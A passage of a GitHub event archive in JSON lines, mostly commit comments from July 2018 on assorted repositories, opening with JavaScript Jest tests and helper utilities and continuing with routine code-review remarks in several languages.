'foo'};\r\n\r\n        const result = getUserId(user);\r\n\r\n        expect(result).toBe('foo');\r\n      });\r\n\r\n      it('should return `id` value, when `id` exists and theres no `_id`', () => {\r\n        const user = { id: 'bar' };\r\n\r\n        const result = getUserId(user);\r\n\r\n        expect(result).toBe('bar');\r\n      });\r\n\r\n      it('should return `undefined` if neither `_id` nor `id` exist', () => {\r\n        const user = {};\r\n\r\n        const result = getUserId(user);\r\n\r\n        expect(result).toBe(undefined);\r\n      });\r\n\r\n      it('should return `undefined` if undefined is passed in', () => {\r\n        const result = getUserId(undefined);\r\n\r\n        expect(result).toBe(undefined);\r\n      });\r\n    });\r\n  });\r\n\r\n  describe('isUserMatchById', () => {\r\n    it('should be defined', () => {\r\n      expect(getUserId).toBeDefined();\r\n    });\r\n\r\n    it('should be a function', () => {\r\n      expect(getUserId).toEqual(expect.any(Function));\r\n    });\r\n\r\n    it('should return `true` when `id` matches', () => {\r\n      const sourceUser = { id: 'foo' };\r\n      const targetUser = { id: 'foo' };\r\n\r\n      const result = isUserMatchById(sourceUser, targetUser);\r\n\r\n      expect(result).toBe(true);\r\n    });\r\n\r\n    it('should return `false` when `id` does not match', () => {\r\n      const sourceUser = { id: 'foo' };\r\n      const targetUser = { id: 'bar' };\r\n\r\n      const result = isUserMatchById(sourceUser, targetUser);\r\n\r\n      expect(result).toBe(false);\r\n    });\r\n\r\n    it('should return `false` when `sourceUser` is empty', () => {\r\n      const sourceUser = undefined;\r\n      const targetUser = { id: 'bar' };\r\n\r\n      const result = isUserMatchById(sourceUser, targetUser);\r\n\r\n      expect(result).toBe(false);\r\n    });\r\n\r\n    it('should return `false` when `targetUser` is empty', () => {\r\n      const sourceUser = { id: 'foo' };\r\n      const targetUser = undefined;\r\n\r\n      const result = isUserMatchById(sourceUser, targetUser);\r\n\r\n      expect(result).toBe(false);\r\n    });\r\n  });\r\n\r\n  describe('isValidUser', () => {\r\n    it('should be defined', () => {\r\n      expect(getUserId).toBeDefined();\r\n    });\r\n\r\n    it('should be a function', () => {\r\n      expect(getUserId).toEqual(expect.any(Function));\r\n    });\r\n\r\n    it('should return `true` when `id` exists', () => {\r\n      expect(isValidUser({ id: 'foo' })).toBe(true);\r\n    });\r\n\r\n    it('should return `false` when `id` does not exist', () => {\r\n      expect(isValidUser({ bar: '' })).toBe(false);\r\n    });\r\n\r\n    it('should return `false` when `id` is empty', () => {\r\n      expect(isValidUser({ id: undefined })).toBe(false);\r\n    });\r\n  });\r\n});\r\n```\r\n\r\nutils/helpers.js\r\n```\r\nconst MAX_SAFE_INTEGER = 9007199254740991;\r\n\r\n/**\r\n * Checks if `value` is array-like. A value is considered array-like if it's\r\n * not a function and has a `value.length` that's an integer greater than or\r\n * equal to `0` and less than or equal to `Number.MAX_SAFE_INTEGER`.\r\n *\r\n * @param {*} value The value to check.\r\n * @returns {boolean} Returns `true` if `value` is array-like, else `false`.\r\n */\r\nconst isArrayLike = value => (\r\n  value != null &&\r\n  typeof value != 'function' &&\r\n  isLength(value.length)\r\n);\r\n\r\n/**\r\n * Checks if `value` is a valid array-like length.\r\n *\r\n * **Note:** This method is loosely based on\r\n * [`ToLength`](http://ecma-international.org/ecma-262/7.0/#sec-tolength).\r\n *\r\n * @param {*} value The value to check.\r\n * @returns {boolean} Returns `true` if `value` is a valid length, else `false`.\r\n */\r\nconst isLength = value => (\r\n  typeof value == 'number' &&\r\n  value > -1 &&\r\n  value % 1 == 0 &&\r\n  value <= MAX_SAFE_INTEGER\r\n);\r\n\r\n/**\r\n * Checks if `value` is likely a prototype object.\r\n *\r\n * @param {*} value The value to check.\r\n * @returns {boolean} Returns `true` if `value` is a prototype, else `false`.\r\n */\r\nconst isPrototype = value => {\r\n  const ctor = value && value.constructor;\r\n  const proto = (typeof ctor === 'function' && ctor.prototype) || Object.prototype;\r\n\r\n  return value === proto;\r\n};\r\n\r\n/**\r\n * Checks if `key` is a direct property of `object`.\r\n *\r\n * @param {Object} object The object to query.\r\n * @param {string} key The key to check.\r\n * @returns {boolean} Returns `true` if `key` exists, else `false`.\r\n */\r\nexport function has(object, key) {\r\n  return object != null && Object.hasOwnProperty.call(object, key);\r\n}\r\n\r\n/**\r\n * Checks if `value` is an empty object, collection, map, or set.\r\n *\r\n * Objects are considered empty if they have no own enumerable string keyed\r\n * properties.\r\n *\r\n * Array-like values such as `arguments` objects, arrays, buffers, strings, or\r\n * jQuery-like collections are considered empty if they have a `length` of `0`.\r\n * Similarly, maps and sets are considered empty if they have a `size` of `0`.\r\n *\r\n * @param {*} value The value to check.\r\n * @returns {boolean} Returns `true` if `value` is empty, else `false`.\r\n */\r\nexport function isEmpty(value) {\r\n  if (value === null) {\r\n    return true;\r\n  }\r\n\r\n  if (isArrayLike(value) || Array.isArray(value)) {\r\n    return !value.length;\r\n  }\r\n\r\n  if (isPrototype(value)) {\r\n    return !Object.keys(value).length;\r\n  }\r\n\r\n  for (const key in value) {\r\n    if (Object.hasOwnProperty.call(value, key)) {\r\n      return false;\r\n    }\r\n  }\r\n\r\n  return true;\r\n}\r\n\r\n/**\r\n * Gets the value at `path` of `object`. If the resolved value is\r\n * `undefined`, the `defaultValue` is returned in its place.\r\n *\r\n * @param {Object} object The object to query.\r\n * @param {Array|string} path The path of the property to get.\r\n * @param {*} [defaultValue] The value returned for `undefined` resolved values.\r\n * @returns {*} Returns the resolved value.\r\n */\r\nexport function get(object, path, defaultValue = undefined) {\r\n  const result = object == null ? undefined : object[path];\r\n  return result === undefined ? defaultValue : result;\r\n}\r\n```\r\n\r\nutils/helpers.test.js\r\n```\r\nimport {\r\n  has,\r\n  get,\r\n  isEmpty\r\n} from './helpers';\r\n\r\ndescribe('Helpers', () => {\r\n  describe('has()', () => {\r\n    it('should be defined', () => {\r\n      expect(has).toBeDefined();\r\n    });\r\n\r\n    it('should be a function', () => {\r\n      expect(has).toEqual(expect.any(Function));\r\n    });\r\n\r\n    it('should return `false` when the passed in object is `null`', () => {\r\n      expect(has(null)).toBe(false);\r\n    });\r\n\r\n    it('should return `false` when `key` is not an object prop', () => {\r\n      const source = { foo: '' };\r\n      const key = 'bar'; \r\n\r\n      expect(has(source, key)).toBe(false);\r\n    });\r\n\r\n    it('should return `true` when `key` exists as an object prop', () => {\r\n      const source = { foo: '' };\r\n      const key = 'foo'; \r\n\r\n      expect(has(source, key)).toBe(true);\r\n    });\r\n  });\r\n\r\n  describe('isEmpty()', () => {\r\n    it('should be defined', () => {\r\n      expect(isEmpty).toBeDefined();\r\n    });\r\n\r\n    it('should be a function', () => {\r\n      expect(isEmpty).toEqual(expect.any(Function));\r\n    });\r\n\r\n    it('should return `true` when the passed in argument is `null`', () => {\r\n      expect(isEmpty(null)).toBe(true);\r\n    });\r\n\r\n    describe('Array', () => {\r\n      it('should return `true` when the array length is 0', () => {\r\n        expect(isEmpty([])).toBe(true);\r\n      });\r\n\r\n      it('should return `false` when the array length greater than 0', () => {\r\n        expect(isEmpty([ 'foo', 'bar' ])).toBe(false);\r\n      });\r\n    });\r\n    \r\n    describe('String', () => {\r\n      it('should return `true` when the string length is 0', () => {\r\n        expect(isEmpty('')).toBe(true);\r\n      });\r\n\r\n      it('should return `false` when the string length greater than 0', () => {\r\n        expect(isEmpty('foo')).toBe(false);\r\n      });\r\n    });\r\n\r\n    describe('Object', () => {\r\n      it('should return `true` when the object is empty', () => {\r\n        expect(isEmpty({})).toBe(true);\r\n      });\r\n\r\n      it('should return `false` when the object has props', () => {\r\n        expect(isEmpty({ foo: '' })).toBe(false);\r\n      });\r\n    });\r\n\r\n    describe('Invalid values', () => {\r\n      it('should return `true` when the passed in arg is a `Number`', () => {\r\n        expect(isEmpty(1)).toBe(true);\r\n      });\r\n\r\n      it('should return `true` when the passed in arg is a `Boolean`', () => {\r\n        expect(isEmpty(false)).toBe(true);\r\n      });\r\n    });\r\n  });\r\n\r\n  describe('get()', () => {\r\n    it('should be defined', () => {\r\n      expect(get).toBeDefined();\r\n    });\r\n\r\n    it('should be a function', () => {\r\n      expect(get).toEqual(expect.any(Function));\r\n    });\r\n\r\n    it('should return `undefined` if the path does not exists', () => {\r\n      const source = {};\r\n      expect(get(source, 'foo')).toBe(undefined);\r\n    });\r\n\r\n    it('should return the expected value at `path`', () => {\r\n      const source = { foo: 'value' };\r\n      expect(get(source, 'foo')).toBe('value');\r\n    });\r\n\r\n    it('should return `defaultvalue` if `path` value is `undefined`', () => {\r\n      const source = { foo: undefined };\r\n      expect(get(source, 'foo', 'defaultValue')).toBe('defaultValue');\r\n    });\r\n  });\r\n});\r\n```"}},"created_at":"2018-07-24T14:42:44Z"}
{"id":"8010661652","type":"CommitCommentEvent","actor":{"login":"jsitnicki"},"repo":{"name":"LorenzoBianconi/ovn-scale-test"},"payload":{"comment":{"id":29815387,"position":25,"line":25,"path":"rally_ovs/plugins/ovs/context/ovnnbctl_daemon.py","commit_id":"78275ac850494df683edd45ae014e8ca9c47aa09","created_at":"2018-07-24T14:42:49Z","updated_at":"2018-07-24T14:42:49Z","author_association":"NONE","body":"The class name (`OvnNbctlDaemonContext`) very roughly corresponds to the context name (`ovn_ctld`).\r\n\r\nIs it a good name? Perhaps `services` or `daemons` would be more self-explanatory. With parameters for deciding which services/daemons get run. Scenario config could look like so:\r\n\r\n```\r\ncontext:\r\n  daemons:\r\n    ovn_nbctl: True\r\n```"}},"created_at":"2018-07-24T14:42:49Z"}
{"id":"8010661808","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"megabytus/thinknetica_home_work"},"payload":{"comment":{"id":29815388,"position":27,"line":27,"path":"ruby_basics_part_1/right-angled_triangle.rb","commit_id":"ca022b14035d63a153530240384c81091961c34e","created_at":"2018-07-24T14:42:50Z","updated_at":"2018-07-24T14:42:50Z","author_association":"NONE","body":"по сути в ТЗ явно оговорены 3 случая:\r\n- \"...является ли треугольник прямоугольным...\"\r\n- \"Также, если треугольник является при этом равнобедренным...\"\r\n- \"Если все 3 стороны равны, то треугольник... равносторонний, но не прямоугольный.\"\r\n\r\nможно еще добавить 4-ый вариант: \"не прямоугольный и не равносторонний\" (по желанию)\r\nпри большом желании еще 5-м вариантом проверитть может ли он вообще существовать с заданными длинами сторон"}},"created_at":"2018-07-24T14:42:50Z"}
{"id":"8010666345","type":"CommitCommentEvent","actor":{"login":"infabo"},"repo":{"name":"justimmo/php-sdk"},"payload":{"comment":{"id":29815400,"position":null,"line":null,"path":null,"commit_id":"91531f691146e177ae243047bdbfb05f22871f0e","created_at":"2018-07-24T14:43:30Z","updated_at":"2018-07-24T14:43:30Z","author_association":"NONE","body":"@Tschebel Warum?"}},"created_at":"2018-07-24T14:43:30Z"}
{"id":"8010669524","type":"CommitCommentEvent","actor":{"login":"Kakatasky"},"repo":{"name":"Kakatasky/exercise"},"payload":{"comment":{"id":29815405,"position":null,"line":null,"path":null,"commit_id":"c1c35885fea60d58027c802639d44f5d811ba613","created_at":"2018-07-24T14:43:57Z","updated_at":"2018-07-24T14:43:57Z","author_association":"OWNER","body":"hompage"}},"created_at":"2018-07-24T14:43:57Z"}
{"id":"8010672844","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"megabytus/thinknetica_home_work"},"payload":{"comment":{"id":29815413,"position":27,"line":27,"path":"ruby_basics_part_1/right-angled_triangle.rb","commit_id":"ca022b14035d63a153530240384c81091961c34e","created_at":"2018-07-24T14:44:25Z","updated_at":"2018-07-24T14:44:25Z","author_association":"NONE","body":"обрати внимание на \"Также\" - равнобедренность нужно проверять ТОЛЬКО, ЕСЛИ он прямоугольный, а у тебя она проверяется в любом случае - это нарушение ТЗ, надо исправлять"}},"created_at":"2018-07-24T14:44:25Z"}
{"id":"8010674846","type":"CommitCommentEvent","actor":{"login":"AlexanderAmelkin"},"repo":{"name":"open-power/vpdtools"},"payload":{"comment":{"id":29815420,"position":48,"line":48,"path":"examples/p9/openbmc/openPower_obmc_opfr_record.xml","commit_id":"0792c52015f3ff1c7186f0ac8b48b109c54df0a1","created_at":"2018-07-24T14:44:43Z","updated_at":"2018-07-24T14:44:43Z","author_association":"NONE","body":"Thanks. Please note though that we're talking \"OpenBMC card\" here, not processor. And we (YADRO) are the manufacturer of the card and the motherboard. The link you provided gives me an \"IBM Confidential\" page without the option to actually download the document. I've requested access and hope to get it soon.\r\n\r\nIn the mean time it would be really great if you could provide details on how the data for this 'MB' field is constructed. We need to encode our BMC card and motherboard manufacturing dates."}},"created_at":"2018-07-24T14:44:43Z"}
{"id":"8010676783","type":"CommitCommentEvent","actor":{"login":"tabeth"},"repo":{"name":"tabeth/node-xhrstub"},"payload":{"comment":{"id":29815422,"position":null,"line":null,"path":null,"commit_id":"7d8245e8853b204e555a222680f66451025c1f2d","created_at":"2018-07-24T14:44:59Z","updated_at":"2018-07-24T14:44:59Z","author_association":"OWNER","body":"Closes #1 "}},"created_at":"2018-07-24T14:44:59Z"}
{"id":"8010678182","type":"CommitCommentEvent","actor":{"login":"timothyhsieh"},"repo":{"name":"timothyhsieh/msgu"},"payload":{"comment":{"id":29815426,"position":null,"line":null,"path":null,"commit_id":"7f51763f8bdca31792f96c7762b95093fd46082a","created_at":"2018-07-24T14:45:12Z","updated_at":"2018-07-24T14:45:12Z","author_association":"OWNER","body":"Created multidev environment [msgu#ci-53](https://dashboard.pantheon.io/sites/a133f0bb-8664-4ab1-8026-2ca11ca8aa7e#ci-53).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-53-msgu.pantheonsite.io/)"}},"created_at":"2018-07-24T14:45:12Z"}
{"id":"8010682263","type":"CommitCommentEvent","actor":{"login":"jsitnicki"},"repo":{"name":"LorenzoBianconi/ovn-scale-test"},"payload":{"comment":{"id":29815436,"position":null,"line":null,"path":null,"commit_id":"6882ec38da0a0135994c1024540b81041d7275bf","created_at":"2018-07-24T14:45:45Z","updated_at":"2018-07-24T14:45:45Z","author_association":"NONE","body":"I think we should detect from the context if daemon is running instead."}},"created_at":"2018-07-24T14:45:45Z"}
{"id":"8010685215","type":"CommitCommentEvent","actor":{"login":"yycunc"},"repo":{"name":"yycunc/SAFEclustering"},"payload":{"comment":{"id":29815441,"position":null,"line":null,"path":null,"commit_id":"44bf572a3b7cfca7e4ccaa3695f764dd66e25241","created_at":"2018-07-24T14:46:10Z","updated_at":"2018-07-24T14:46:10Z","author_association":"OWNER","body":"shmetis is a compiled program used for HGPA partitioning, which is from the hMETIS package v. 1.5 (Karypis et al., IEEE Transactions on Very Large Scale Integration (VLSI) Systems, 1999)."}},"created_at":"2018-07-24T14:46:10Z"}
{"id":"8010686217","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"megabytus/thinknetica_home_work"},"payload":{"comment":{"id":29815445,"position":27,"line":27,"path":"ruby_basics_part_1/right-angled_triangle.rb","commit_id":"ca022b14035d63a153530240384c81091961c34e","created_at":"2018-07-24T14:46:19Z","updated_at":"2018-07-24T14:46:19Z","author_association":"NONE","body":"ну и проверки на равностороннесть не хватает )"}},"created_at":"2018-07-24T14:46:19Z"}
{"id":"8010686978","type":"CommitCommentEvent","actor":{"login":"bnovoselnik"},"repo":{"name":"acados/acados"},"payload":{"comment":{"id":29815446,"position":17,"line":453,"path":"acados/dense_qp/dense_qp_common.c","commit_id":"1c9879eb3408613025cccdf889a0ea5d8dd42b7f","created_at":"2018-07-24T14:46:25Z","updated_at":"2018-07-24T14:46:25Z","author_association":"CONTRIBUTOR","body":"just getting rid of unused variables warnings"}},"created_at":"2018-07-24T14:46:25Z"}
{"id":"8010698591","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"megabytus/thinknetica_home_work"},"payload":{"comment":{"id":29815466,"position":13,"line":13,"path":"ruby_basics_part_1/triangle_area.rb","commit_id":"d61038bdee5dc85b0e46d5a20955d288dab82062","created_at":"2018-07-24T14:48:06Z","updated_at":"2018-07-24T14:48:06Z","author_association":"NONE","body":"рекомендуется давать переменным \"говорящие\" имена, чтобы впоследствии было проще читать и понимать код\r\nк примеру данную переменную можно было бы назвать `base`, `height`"}},"created_at":"2018-07-24T14:48:06Z"}
{"id":"8010699467","type":"CommitCommentEvent","actor":{"login":"dkouzoup"},"repo":{"name":"acados/acados"},"payload":{"comment":{"id":29815468,"position":17,"line":453,"path":"acados/dense_qp/dense_qp_common.c","commit_id":"1c9879eb3408613025cccdf889a0ea5d8dd42b7f","created_at":"2018-07-24T14:48:13Z","updated_at":"2018-07-24T14:48:13Z","author_association":"MEMBER","body":"ok! And why not just deleting/commenting out their definitions instead?"}},"created_at":"2018-07-24T14:48:13Z"}
{"id":"8010706814","type":"CommitCommentEvent","actor":{"login":"nicolasbock"},"repo":{"name":"video-game-coding-club/geometry-smash"},"payload":{"comment":{"id":29815478,"position":6,"line":31,"path":"main.js","commit_id":"c18de64d1b251dd69399a8f02f467a7025c31d8c","created_at":"2018-07-24T14:49:15Z","updated_at":"2018-07-24T14:49:15Z","author_association":"CONTRIBUTOR","body":"It was correct before. Try `ctx.rect()` thought. You can get more information on this method at\r\n\r\nhttps://developer.mozilla.org/en-US/docs/Web/API/CanvasRenderingContext2D/rect"}},"created_at":"2018-07-24T14:49:15Z"}
{"id":"8010708430","type":"CommitCommentEvent","actor":{"login":"bnovoselnik"},"repo":{"name":"acados/acados"},"payload":{"comment":{"id":29815479,"position":17,"line":453,"path":"acados/dense_qp/dense_qp_common.c","commit_id":"1c9879eb3408613025cccdf889a0ea5d8dd42b7f","created_at":"2018-07-24T14:49:29Z","updated_at":"2018-07-24T14:49:29Z","author_association":"CONTRIBUTOR","body":"because I actually do use them in asserts but somehow compiler still complains they are unused"}},"created_at":"2018-07-24T14:49:29Z"}
{"id":"8010709205","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"megabytus/thinknetica_home_work"},"payload":{"comment":{"id":29815482,"position":15,"line":15,"path":"ruby_basics_part_1/triangle_area.rb","commit_id":"d61038bdee5dc85b0e46d5a20955d288dab82062","created_at":"2018-07-24T14:49:36Z","updated_at":"2018-07-24T14:49:36Z","author_association":"NONE","body":"лучше отедлять логику и вычисления от аутпута\r\nправильней будет отдельно посчитать площадь, присвоить значение в переменную, а уже замем эту переменную передать в аутпут"}},"created_at":"2018-07-24T14:49:36Z"}
{"id":"8010709773","type":"CommitCommentEvent","actor":{"login":"nicolasbock"},"repo":{"name":"video-game-coding-club/geometry-smash"},"payload":{"comment":{"id":29815484,"position":null,"line":null,"path":null,"commit_id":"c18de64d1b251dd69399a8f02f467a7025c31d8c","created_at":"2018-07-24T14:49:41Z","updated_at":"2018-07-24T14:49:41Z","author_association":"CONTRIBUTOR","body":"@lucasprice Could you open a \"pull request\" for this branch? Then it's easier to comment on your changes. Thanks!"}},"created_at":"2018-07-24T14:49:41Z"}
{"id":"8010711157","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"megabytus/thinknetica_home_work"},"payload":{"comment":{"id":29815489,"position":13,"line":13,"path":"ruby_basics_part_1/triangle_area.rb","commit_id":"d61038bdee5dc85b0e46d5a20955d288dab82062","created_at":"2018-07-24T14:49:53Z","updated_at":"2018-07-24T14:49:53Z","author_association":"NONE","body":"использование однобуквенных переменных может быть оправданно разве что в случаях, когда эти названия диктует контекст задачи\r\nк примеру, если это коэффициэнты уравнения, произвольные стороны геометрической фигуры и т.п."}},"created_at":"2018-07-24T14:49:53Z"}
{"id":"8010720266","type":"CommitCommentEvent","actor":{"login":"dkouzoup"},"repo":{"name":"acados/acados"},"payload":{"comment":{"id":29815502,"position":17,"line":453,"path":"acados/dense_qp/dense_qp_common.c","commit_id":"1c9879eb3408613025cccdf889a0ea5d8dd42b7f","created_at":"2018-07-24T14:51:10Z","updated_at":"2018-07-24T14:51:10Z","author_association":"MEMBER","body":"ahaa, I see! Good point. If you compile CMAKE with release and not debug, the asserts are removed, maybe that's why the compiler complains about it. You could also maybe use directly e.g. in->dim->nv in the asserts instead?"}},"created_at":"2018-07-24T14:51:10Z"}
{"id":"8010721657","type":"CommitCommentEvent","actor":{"login":"JensDebergh"},"repo":{"name":"react-community/react-native-image-picker"},"payload":{"comment":{"id":29815506,"position":null,"line":null,"path":null,"commit_id":"4535b152af8adb47b3dd438e2ff6b59786dd1d8a","created_at":"2018-07-24T14:51:22Z","updated_at":"2018-07-24T14:51:22Z","author_association":"NONE","body":"@ligaz How are we supposed to import the individual interfaces in our own code if they aren't exported anymore?\r\n\r\nAm I missing something?\r\n\r\n```\r\nimport ImagePicker from 'react-native-image-picker' --> works\r\nimport ImagePicker, { Response as ImagePickerResponse } from 'react-native-image-picker' --> does not since it isn't exported anymore\r\n```"}},"created_at":"2018-07-24T14:51:22Z"}
{"id":"8010721756","type":"CommitCommentEvent","actor":{"login":"r10s"},"repo":{"name":"deltachat/deltachat-ios"},"payload":{"comment":{"id":29815507,"position":null,"line":null,"path":null,"commit_id":"dd6a468965501762dbd66563ad7c41472356f215","created_at":"2018-07-24T14:51:22Z","updated_at":"2018-07-24T14:51:22Z","author_association":"MEMBER","body":"very cool :)"}},"created_at":"2018-07-24T14:51:22Z"}
{"id":"8010728863","type":"CommitCommentEvent","actor":{"login":"stefanivic"},"repo":{"name":"stefanivic/next.js"},"payload":{"comment":{"id":29815514,"position":null,"line":null,"path":null,"commit_id":"b7cf52e6ea8a9fc694de4d8776da5ae86268a153","created_at":"2018-07-24T14:52:21Z","updated_at":"2018-07-24T14:52:21Z","author_association":"OWNER","body":"Tackles the issue in #4027.\r\n\r\n"}},"created_at":"2018-07-24T14:52:21Z"}
{"id":"8010730879","type":"CommitCommentEvent","actor":{"login":"loup99"},"repo":{"name":"loup99/WtWSMS"},"payload":{"comment":{"id":29815515,"position":25,"line":1342,"path":"WTWSMS/decisions/WtWSMS_realm_decisions.txt","commit_id":"ade80c9241f9b3d1088cf77699e7b76179aa7b5f","created_at":"2018-07-24T14:52:38Z","updated_at":"2018-07-24T14:52:38Z","author_association":"OWNER","body":"Yes, Justinian didn't hold Athens personally."}},"created_at":"2018-07-24T14:52:38Z"}
{"id":"8010732079","type":"CommitCommentEvent","actor":{"login":"loup99"},"repo":{"name":"loup99/WtWSMS"},"payload":{"comment":{"id":29815519,"position":28,"line":1345,"path":"WTWSMS/decisions/WtWSMS_realm_decisions.txt","commit_id":"ade80c9241f9b3d1088cf77699e7b76179aa7b5f","created_at":"2018-07-24T14:52:48Z","updated_at":"2018-07-24T14:52:48Z","author_association":"OWNER","body":"Same as in history as well."}},"created_at":"2018-07-24T14:52:48Z"}
{"id":"8010736390","type":"CommitCommentEvent","actor":{"login":"komalsrathi"},"repo":{"name":"komalsrathi/Microarray_Analysis"},"payload":{"comment":{"id":29815529,"position":null,"line":null,"path":null,"commit_id":"4ecef78e9425dea78c2ee610a18a1e0c3a0687f9","created_at":"2018-07-24T14:53:26Z","updated_at":"2018-07-24T14:53:26Z","author_association":"OWNER","body":"@Aviseka can you confirm that you have the R packages (oligo etc) mentioned in the Description? \r\nhttps://github.com/komalsrathi/Microarray_Analysis/blob/master/OligoTools/DESCRIPTION"}},"created_at":"2018-07-24T14:53:26Z"}
{"id":"8010743507","type":"CommitCommentEvent","actor":{"login":"xDoneZ"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29815546,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T14:54:27Z","updated_at":"2018-07-24T14:54:27Z","author_association":"NONE","body":"Good project. Wish you luck"}},"created_at":"2018-07-24T14:54:27Z"}
{"id":"8010744416","type":"CommitCommentEvent","actor":{"login":"the-j0k3r"},"repo":{"name":"the-j0k3r/GitHub-Community-Dark"},"payload":{"comment":{"id":29815551,"position":null,"line":null,"path":null,"commit_id":"d356b181dda2aa6e4c242f92c676bbdb7ac47af0","created_at":"2018-07-24T14:54:35Z","updated_at":"2018-07-24T14:54:35Z","author_association":"OWNER","body":"It is Ive updated and pushed changes already ... you replied to my fork hahaha"}},"created_at":"2018-07-24T14:54:35Z"}
{"id":"8010746485","type":"CommitCommentEvent","actor":{"login":"alexey-lysiuk"},"repo":{"name":"coelckers/gzdoom"},"payload":{"comment":{"id":29815559,"position":null,"line":null,"path":null,"commit_id":"280dd765e57b650b10a8ab5a2faeec860a4d6ef8","created_at":"2018-07-24T14:54:53Z","updated_at":"2018-07-24T14:54:53Z","author_association":"COLLABORATOR","body":"Please do not take personally but I still have some comments\r\n\r\n* No need to replace all `NULL` with `nullptr`, just use `nullptr` in new code and replace it in modified code only\r\n* The primary purpose of a member function was to avoid global variables. Library handle and function pointer could become class members. Sorry, I didn't mention this initially\r\n* Those ugly pointer-to-function declaration and cast can be replaced with `typedef` (or `using` if you prefer modern C++). Previously I missed that too 😞 \r\n* Two arguments of `GetWindowBordersSize()` are never used, what's the point of them? You can pass them by reference to avoid checking for `nullptr`\r\n* And I really don't like `if (!a) { b; } else { c; }`, it should be `if (a) { c; } else { b; }`. It's OK to use negation in `if` with true branch only but with both branches it's harder to understand\r\n"}},"created_at":"2018-07-24T14:54:53Z"}
{"id":"8010749346","type":"CommitCommentEvent","actor":{"login":"fernandobenitopicazo"},"repo":{"name":"fernandobenitopicazo/TesisFer"},"payload":{"comment":{"id":29815571,"position":null,"line":null,"path":null,"commit_id":"3bbb400197ab513ceb0d2ad498d7c045685e69ef","created_at":"2018-07-24T14:55:18Z","updated_at":"2018-07-24T14:55:18Z","author_association":"OWNER","body":"Respuestas Fer hasta donde has revisado Manolo (1.1. Claves Minimales)"}},"created_at":"2018-07-24T14:55:18Z"}
{"id":"8010752959","type":"CommitCommentEvent","actor":{"login":"DoccyB"},"repo":{"name":"DoccyB/cycledata"},"payload":{"comment":{"id":29815573,"position":null,"line":null,"path":null,"commit_id":"22ca48a8b05249765decc9a0a80db91133997057","created_at":"2018-07-24T14:55:49Z","updated_at":"2018-07-24T14:55:49Z","author_association":"OWNER","body":"Struggling with moving database.php to the helpers directory.\n\ni git mv it and change the path in controller.php, all works except for the\nmap.\n\nI change the path in API.php and the map will still not work:\n\n\n\n\nthoughts?\n\nOn 24 July 2018 at 14:34, Martin <notifications@github.com> wrote:\n\n> You need to avoid that hard-coded path. Just make it relative, i.e. ../\n> kind of thing.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/DoccyB/cycledata/commit/22ca48a8b05249765decc9a0a80db91133997057#commitcomment-29814293>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AXIQ3KbahbUiQ7a3Ymu8iZHNwQcIY01Qks5uJyJSgaJpZM4Vcv-n>\n> .\n>\n"}},"created_at":"2018-07-24T14:55:49Z"}
{"id":"8010753293","type":"CommitCommentEvent","actor":{"login":"Tdual"},"repo":{"name":"Tdual/matrixflow"},"payload":{"comment":{"id":29815576,"position":null,"line":null,"path":null,"commit_id":"2a7a791d8e8522ff88e621fc12368f927e4f8056","created_at":"2018-07-24T14:55:52Z","updated_at":"2018-07-24T14:55:52Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [create the API to edit details.](https://trello.com/c/Dlnkm8Cw/50-create-the-api-to-edit-details)"}},"created_at":"2018-07-24T14:55:52Z"}
{"id":"8010755504","type":"CommitCommentEvent","actor":{"login":"Tdual"},"repo":{"name":"Tdual/matrixflow"},"payload":{"comment":{"id":29815578,"position":null,"line":null,"path":null,"commit_id":"2a7a791d8e8522ff88e621fc12368f927e4f8056","created_at":"2018-07-24T14:56:11Z","updated_at":"2018-07-24T14:56:11Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [add \"edit\" button to detail pages.](https://trello.com/c/JlMuIiCX/49-add-edit-button-to-detail-pages)"}},"created_at":"2018-07-24T14:56:11Z"}
{"id":"8010757241","type":"CommitCommentEvent","actor":{"login":"giacomofiorin"},"repo":{"name":"Colvars/colvars"},"payload":{"comment":{"id":29815580,"position":null,"line":null,"path":null,"commit_id":"acdf3228bc9439df108fad935cd6c20d06a0b526","created_at":"2018-07-24T14:56:25Z","updated_at":"2018-07-24T14:56:25Z","author_association":"MEMBER","body":"PDB files are like the measles: they can never be truly eliminated.\n\nSince they are common to VMD and NAMD, I would put them in the top-level\nfolder, just not in the corresponding build script.  We'll build the NAMD\nand VMD tests manually.\n\nOn Tue, Jul 24, 2018 at 10:09 AM Jérôme Hénin <notifications@github.com>\nwrote:\n\n> Actually this was motivated by another use case, brought by another user.\n> I'd add the case to the top-level tests directory, but for now those tests\n> are generic and don't assume a PDB parser - the use case we're talking\n> about is PDB only. Can I isolate the PDB case somehow, or should it go into\n> NAMD/VMD tests?\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Colvars/colvars/commit/acdf3228bc9439df108fad935cd6c20d06a0b526#commitcomment-29814942>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AETZWUhQKwMOBy-CpUkG9VEZy5N0OPxdks5uJyqNgaJpZM4VYEXO>\n> .\n>\n\n\n-- \nGiacomo Fiorin\nAssociate Professor of Research, Temple University, Philadelphia, PA\nContractor, National Institutes of Health, Bethesda, MD\nhttp://goo.gl/Q3TBQU\nhttps://github.com/giacomofiorin\n"}},"created_at":"2018-07-24T14:56:25Z"}
